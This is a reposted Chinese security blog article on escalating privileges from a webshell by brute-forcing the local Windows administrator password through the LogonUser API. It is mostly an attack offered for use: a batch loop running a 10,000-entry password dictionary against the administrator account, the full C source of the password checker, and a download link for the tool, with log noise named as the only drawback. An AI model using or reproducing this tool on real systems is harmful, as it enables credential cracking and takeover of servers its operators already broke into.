webshell下的另类提权之3389密码爆破

颓废 2019年5月19日06:45:30评论688 views字数 778阅读2分35秒阅读模式
摘要

在土司看到的由x0wolf发布的一个提权新思路觉得不错就收藏过来了。 利用 LogonUser API 模拟用户登陆  判断账号密码登陆成功与否(就是本地爆破) 该种方法不通过网络 速度极快 低权限 (webshell下) 就可以运行 for /f %i in (10k_passwd.txt) do test.exe administrator %i 1w 字典几乎是几秒,缺点就是会产生大量系统登陆日志。 脚本:

在土司看到的由x0wolf发布的一个提权新思路觉得不错就收藏过来了。 利用 LogonUser API 模拟用户登陆  判断账号密码登陆成功与否(就是本地爆破) 该种方法不通过网络 速度极快 低权限 (webshell下) 就可以运行 for /f %i in (10k_passwd.txt) do test.exe administrator %i 1w 字典几乎是几秒,缺点就是会产生大量系统登陆日志。 脚本:

#include #include   void help()  {                     printf("by x0wolf && lostwolf n");                      printf("runas user passn");  }    int LoginCreateProcess(char* user,char* pass)  {                     HANDLE hToken;              STARTUPINFOA   si;              PROCESS_INFORMATION pi;               ZeroMemory(&si, sizeof(si));              ZeroMemory(&pi, sizeof(pi));               si.cb = sizeof(si);                if(0 == LogonUser(user, ".", pass, LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, &hToken))  {                               printf("Failed to call LogonUser FailedNum:%dn",GetLastError());              return 0;     }                       else   {                               printf("Login Sucessedn");               return 1;   }   }                 int main(int argc,char* argv[])  {                       if(argc!=3)  {                               help();                               exit(0);            }                       if(argc==3)           {                               LoginCreateProcess(argv[1],argv[2]);           }    }

工具下载:https://pan.baidu.com/s/1sl54gUh

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日06:45:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   webshell下的另类提权之3389密码爆破http://cn-sec.com/archives/67530.html

发表评论

匿名网友 填写信息